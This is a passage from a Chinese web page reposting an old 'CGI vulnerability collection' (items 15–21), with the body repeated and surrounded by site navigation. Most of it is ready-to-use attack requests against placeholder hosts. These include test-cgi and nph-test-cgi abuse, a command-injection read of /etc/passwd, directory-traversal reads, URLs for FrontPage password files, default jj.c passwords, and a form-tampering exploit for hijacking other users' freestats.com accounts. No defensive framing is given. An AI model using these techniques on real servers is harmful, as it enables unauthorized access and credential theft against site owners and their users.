CGI漏洞集锦_争怎路由网

?data=Download
注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命
令.
十五.test-cgi
lynx http://www.victim.com/cgi-bin/test-cgi?\whatever
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
得到一些http的目录
lynx http://www.victim.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
这招好象并不管用.:(
lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
还可以这样试
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *
十六.对于某些BSD的apache可以:
lynx http://www.victim.com/root/etc/passwd
lynx http://www.victim.com/~root/etc/passwd
十七.htmlscript
lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd
十八.jj.c
The demo cgi program jj.c calls /bin/mail without filtering user
input, so any program based on jj.c could potentially be exploited by
simply adding a followed by a Unix command. It may require a
password, but two known passwords include HTTPdrocks and SDGROCKS. If
you can retrieve a copy of the compiled program running strings on it
will probably reveil the password.
Do a web search on jj.c to get a copy and study the code yourself if
you have more questions.
十九.Frontpage extensions
如果你读http://www.victim.com/_vti_inf.html你将得到FP extensions的版本
和它在服务器上的路径. 还有一些密码文件如:
http://www.victim.com/_vti_pvt/service.pwd
http://www.victim.com/_vti_pvt/users.pwd
http://www.victim.com/_vti_pvt/authors.pwd
http://www.victim.com/_vti_pvt/administrators.pwd
二十.Freestats.com CGI
没有碰到过,觉的有些地方不能搞错,所以直接贴英文.
John Carlton found following. He developed an exploit for the
free web stats services offered at freestats.com, and supplied the
webmaster with proper code to patch the bug.
Start an account with freestats.com, and log in. Click on the
area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER
INFO" This will call up a file called edit.pl with your user #
and password included in it. Save this file to your hard disk and
open it with notepad. The only form of security in this is a
hidden attribute on the form element of your account number.
Change this from
*input type=hidden name=account value=your#*
to
*input type=text name=account value=""*
Save your page and load it into your browser. Their will now be a
text input box where the hidden element was before. Simply type a
# in and push the "click here to update user profile" and all the
information that appears on your screen has now been written to
that user profile.
But that isn't the worst of it. By using frames (2 frames, one to
hold this page you just made, and one as a target for the form
submission) you could change the password on all of their accounts
with a simple javascript function.
Deep inside the web site authors still have the good old "edit.pl"
script. It takes some time to reach it (unlike the path described)
but you can reach it directly at:
http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=
二十一.Vulnerability in Glimpse HTTP
telnet target.machine.com 80
GET /cgi-bin/aglimpse/80

关键词：CGI漏洞集锦

争怎路由网：是一个主要分享无线路由器安装设置经验的网站，汇总WiFi常见问题的解决方法。争怎路由网网线连接电脑联网分出来 Internet wifi显示网站首页不能上网路由器密码 WiFi设置路由器设置 TP-Link 腾达路由器软件教程游戏教程系统下载您当前所在位置：下载首页 -> 杀毒教程
CGI漏洞集锦时间：2024/5/4作者：未知来源：争怎路由网人气： ?data=Download 注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令. 十五.test-cgi lynx http://www.victim.com/cgi-bin/test-cgi?\whatever CGI/1.0 test script report: argc is 0. argv is . SERVER_SOFTWARE = NCSA/1.4B SERVER_NAME = victim.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/1.0 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = text/plain, application/x-html, application/html, text/html, text/x-html PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /cgi-bin/test-cgi QUERY_STRING = whatever REMOTE_HOST = fifth.column.gov REMOTE_ADDR = 200.200.200.200 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = 得到一些http的目录 lynx http://www.victim.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd 这招好象并不管用.:( lynx http://www.victim.com/cgi-bin/nph-test-cgi?/* 还可以这样试 GET /cgi-bin/test-cgi?* HTTP/1.0 GET /cgi-bin/test-cgi?x * GET /cgi-bin/nph-test-cgi?* HTTP/1.0 GET /cgi-bin/nph-test-cgi?x * GET /cgi-bin/test-cgi?x HTTP/1.0 * GET /cgi-bin/nph-test-cgi?x HTTP/1.0 * 十六.对于某些BSD的apache可以: lynx http://www.victim.com/root/etc/passwd lynx http://www.victim.com/~root/etc/passwd 十七.htmlscript lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd 十八.jj.c The demo cgi program jj.c calls /bin/mail without filtering user input, so any program based on jj.c could potentially be exploited by simply adding a followed by a Unix command. It may require a password, but two known passwords include HTTPdrocks and SDGROCKS. If you can retrieve a copy of the compiled program running strings on it will probably reveil the password. Do a web search on jj.c to get a copy and study the code yourself if you have more questions. 十九.Frontpage extensions 如果你读http://www.victim.com/_vti_inf.html你将得到FP extensions的版本和它在服务器上的路径. 还有一些密码文件如: http://www.victim.com/_vti_pvt/service.pwd http://www.victim.com/_vti_pvt/users.pwd http://www.victim.com/_vti_pvt/authors.pwd http://www.victim.com/_vti_pvt/administrators.pwd 二十.Freestats.com CGI 没有碰到过,觉的有些地方不能搞错,所以直接贴英文. John Carlton found following. He developed an exploit for the free web stats services offered at freestats.com, and supplied the webmaster with proper code to patch the bug. Start an account with freestats.com, and log in. Click on the area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER INFO" This will call up a file called edit.pl with your user # and password included in it. Save this file to your hard disk and open it with notepad. The only form of security in this is a hidden attribute on the form element of your account number. Change this from input type=hidden name=account value=your# to input type=text name=account value="" Save your page and load it into your browser. Their will now be a text input box where the hidden element was before. Simply type a # in and push the "click here to update user profile" and all the information that appears on your screen has now been written to that user profile. But that isn't the worst of it. By using frames (2 frames, one to hold this page you just made, and one as a target for the form submission) you could change the password on all of their accounts with a simple javascript function. Deep inside the web site authors still have the good old "edit.pl" script. It takes some time to reach it (unlike the path described) but you can reach it directly at: http://www.sitetracker.com/cgi-bin/edit.pl?account=&password= 二十一.Vulnerability in Glimpse HTTP telnet target.machine.com 80 GET /cgi-bin/aglimpse/80 关键词：CGI漏洞集锦	*软件教程* 聊天工具办公软件杀毒教程系统工具图形图像电脑学习应用软件网络软件苹果应用多媒体区网站教程其它教程技术开发安卓教程 *人气排行* 1局域网内命令大全 22017好用的公共DNS推荐 3Windows 0day EternalBlue(永恒之蓝... 4腾讯王卡1元1天宽带活动正式开发办理！ 5“鲁大师”说：Windows7也得有安全意识 6菲律宾某省政府网站被黑疑为国内黑客所为 7小心应对也许会出现的10.10.10电脑病毒 8无线网络连接上但上不了网处理方法 9Win8上帝模式使用图文详细教程图文详细教程如何打开Wi... 10是怕不给礼金？伴娘太敬业胸挂二维码 *推荐资讯* 1TP-Link TL-WDR6320 无线路由器上网设置 ... 2Serv-U FTP Server远程/本地提升权限缺陷 3不想要双系统了要如何干掉win7系统 4爱闹直播如何关注主播爱闹直播关注主播方法介绍 5微信PC版扫二维码查看订阅号 6微信小程序网络请求的封装与改进 7如何安装WampServer以及安装问题的处理 8Win8系统搜索框无法输入字符如何处理？ 9mix滤镜大师如何设置阴影 mix滤镜大师阴影设置流程 10微信小程序：view（视图容器）组件解读与区分
Copyright © 2012-2018 争怎路由网(http://www.zhengzen.com) .All Rights Reserved 网站地图友情链接免责声明：本站资源均来自互联网收集如有侵犯到您利益的地方请及时联系管理删除，敬请见谅! QQ:1006262270 邮箱:kfyvi376850063@126.com 手机版